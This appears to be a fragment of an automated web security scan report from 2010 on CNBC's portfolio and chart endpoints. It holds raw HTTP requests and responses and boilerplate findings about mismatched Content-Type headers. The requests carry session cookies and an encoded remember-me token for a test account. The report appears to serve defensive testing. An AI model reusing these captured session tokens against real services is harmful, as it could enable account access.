<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Market Movers</title> <link rel="stylesheet" href ...[SNIP]...
GET / HTTP/1.1 Host: apps.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=%5B%5BB%5D%5D; Axxd=1; 1948%5F0=EE145EA19001573DA10C81C1F2D92ECE; AxData=; GZIP=1; 1602%5F0=3603DAE9282E48DC15A921BB672899FF; s_cc=true; 1602%5F1=YYY5%5FQcZo0zXHPE%2FK48o9IovtoQ%3D%3D; TZM=-360; PNG=0; s_nr=1292953358790; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=698F629D8D09311DADAE187E0DFFC18F; c_sna=false;
Response
HTTP/1.1 403 Forbidden Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 19:33:46 GMT Content-Type: text/html Connection: close Content-Length: 218 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET
<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b ...[SNIP]...
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:41:33 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 222 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" GZIP: 1 Set-Cookie: GZIP=0; expires=Thu, 20-Jan-2011 17:41:34 GMT; path=/
// This is executed on the browser if the decompression worked if (document.getElementById) { document.writeln('<script language="JavaScript" src="/Includes/CheckGzip/On.asp">'); document.writ ...[SNIP]...
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:41:08 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 409 Expires: Tue, 21 Dec 2010 17:40:08 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET
function onPng(bLoad) { var Png = document.checkPng; Png.onerror = null; Png.onload = null; if (bLoad && Png.width == 1 && Png.height == 1) { Png.src = "//apps.cnbc.com/Includes/CheckPng ...[SNIP]...
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:41:06 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 1245 Expires: Tue, 21 Dec 2010 17:01:06 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Set-Cookie: 1602%5F0=3603DAE9282E48DC15A921BB672899FF; path=/ Set-Cookie: 1602%5F1=YYY5%5FQcZo0zXHPE%2FK48o9IovtoQ%3D%3D; expires=Thu, 29-Aug-2024 16:41:06 GMT; path=/
GET /portfolio/resources/buffer/CompanyLookup.load.asp HTTP/1.1 Host: apps.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=%5B%5BB%5D%5D; Axxd=1; 1948%5F0=EE145EA19001573DA10C81C1F2D92ECE; AxData=; GZIP=1; 1602%5F0=3603DAE9282E48DC15A921BB672899FF; s_cc=true; 1602%5F1=YYY5%5FQcZo0zXHPE%2FK48o9IovtoQ%3D%3D; TZM=-360; PNG=0; s_nr=1292953358790; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=698F629D8D09311DADAE187E0DFFC18F; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:22:52 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Connection: close P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 63 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:42:52 GMT Cache-control: private
GET /portfolio/resources/buffer/Portfolio.addTransaction.asp HTTP/1.1 Host: apps.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=%5B%5BB%5D%5D; Axxd=1; 1948%5F0=EE145EA19001573DA10C81C1F2D92ECE; AxData=; GZIP=1; 1602%5F0=3603DAE9282E48DC15A921BB672899FF; s_cc=true; 1602%5F1=YYY5%5FQcZo0zXHPE%2FK48o9IovtoQ%3D%3D; TZM=-360; PNG=0; s_nr=1292953358790; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=698F629D8D09311DADAE187E0DFFC18F; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:22:52 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Connection: close P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 65 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:42:53 GMT Cache-control: private
{"errorCode":-1,"errorDetails":"No portfolio name was specified"}
GET /portfolio/resources/buffer/Portfolio.createPortfolio.asp HTTP/1.1 Host: apps.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=%5B%5BB%5D%5D; Axxd=1; 1948%5F0=EE145EA19001573DA10C81C1F2D92ECE; AxData=; GZIP=1; 1602%5F0=3603DAE9282E48DC15A921BB672899FF; s_cc=true; 1602%5F1=YYY5%5FQcZo0zXHPE%2FK48o9IovtoQ%3D%3D; TZM=-360; PNG=0; s_nr=1292953358790; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=698F629D8D09311DADAE187E0DFFC18F; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:22:48 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Connection: close P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 65 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:42:49 GMT Cache-control: private
{"errorCode":-1,"errorDetails":"No portfolio was name specified"}
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /api/chart/chart.asp HTTP/1.1 Host: api-cdn.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; Axxd=1; s_sq=%5B%5BB%5D%5D; AxData=; s_cc=true; s_nr=1292257245769; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-1082571395-1289590021769; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Content-Type: text/html Cache-Control: private Content-Length: 70 Expires: Tue, 21 Dec 2010 18:37:52 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Vary: Accept-Encoding Date: Tue, 21 Dec 2010 19:17:52 GMT Connection: close
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /api/chart/chart.asp HTTP/1.1 Host: api.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CMain%252520Menu%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/email/EmailSupport.jsp%2526ot%253DA; Axxd=1; AxData=; s_cc=true; s_nr=1292954620754; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=465842946614631C03276B09EE6F4482; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:17:54 GMT IISExport: This web site was exported using IIS Export v4.2 Connection: close P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 70 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:37:54 GMT Cache-control: private
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:41:33 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 222 IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" GZIP: 1 Set-Cookie: GZIP=0; expires=Thu, 20-Jan-2011 17:41:34 GMT; path=/
// This is executed on the browser if the decompression worked if (document.getElementById) { document.writeln('<script language="JavaScript" src="/Includes/CheckGzip/On.asp">'); document.writ ...[SNIP]...
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 21 Dec 2010 17:41:08 GMT Content-Type: text/html Connection: keep-alive Cache-Control: private Content-Length: 409 Expires: Tue, 21 Dec 2010 17:40:08 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET
function onPng(bLoad) { var Png = document.checkPng; Png.onerror = null; Png.onload = null; if (bLoad && Png.width == 1 && Png.height == 1) { Png.src = "//apps.cnbc.com/Includes/CheckPng ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain JSON.
Request
GET /portfolio/resources/buffer/CompanyLookup.load.asp HTTP/1.1 Host: apps.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=%5B%5BB%5D%5D; Axxd=1; 1948%5F0=EE145EA19001573DA10C81C1F2D92ECE; AxData=; GZIP=1; 1602%5F0=3603DAE9282E48DC15A921BB672899FF; s_cc=true; 1602%5F1=YYY5%5FQcZo0zXHPE%2FK48o9IovtoQ%3D%3D; TZM=-360; PNG=0; s_nr=1292953358790; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=698F629D8D09311DADAE187E0DFFC18F; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:22:52 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Connection: close P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 63 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:42:52 GMT Cache-control: private
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain JSON.
Request
GET /portfolio/resources/buffer/Portfolio.addTransaction.asp HTTP/1.1 Host: apps.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=%5B%5BB%5D%5D; Axxd=1; 1948%5F0=EE145EA19001573DA10C81C1F2D92ECE; AxData=; GZIP=1; 1602%5F0=3603DAE9282E48DC15A921BB672899FF; s_cc=true; 1602%5F1=YYY5%5FQcZo0zXHPE%2FK48o9IovtoQ%3D%3D; TZM=-360; PNG=0; s_nr=1292953358790; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=698F629D8D09311DADAE187E0DFFC18F; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:22:52 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Connection: close P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 65 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:42:53 GMT Cache-control: private
{"errorCode":-1,"errorDetails":"No portfolio name was specified"}
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain JSON.
Request
GET /portfolio/resources/buffer/Portfolio.createPortfolio.asp HTTP/1.1 Host: apps.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SUBSCRIBERINFO=T; SUBSCRIBERINFO2=f253efe302d32ab264a76e0ce65be769; c_enc=g0gL3psSgYxqAAMwCf69qoF3AnP2umz1anXrD6CCmSE=; SUBSCRIBERINFO3=unkz; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=test@fastdial.net:dGVzdEBmYXN0ZGlhbC5uZXQ6MTI5NDE2MjgzOTQzNzo4ODlmNDBhMTA4NzJiMTZlMWJkMzA5YjI3OGJkNTMyOA==; cnbc_most_recent_quotes=OIH; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_sq=%5B%5BB%5D%5D; Axxd=1; 1948%5F0=EE145EA19001573DA10C81C1F2D92ECE; AxData=; GZIP=1; 1602%5F0=3603DAE9282E48DC15A921BB672899FF; s_cc=true; 1602%5F1=YYY5%5FQcZo0zXHPE%2FK48o9IovtoQ%3D%3D; TZM=-360; PNG=0; s_nr=1292953358790; CASTOKEN=test@fastdial.net; USERFONTSIZE=1; __qca=P0-2146369917-1292953196619; c_ws=698F629D8D09311DADAE187E0DFFC18F; c_sna=false;
Response
HTTP/1.1 200 OK Date: Tue, 21 Dec 2010 19:22:48 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET Connection: close P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 65 Content-Type: text/html Expires: Tue, 21 Dec 2010 18:42:49 GMT Cache-control: private
{"errorCode":-1,"errorDetails":"No portfolio was name specified"}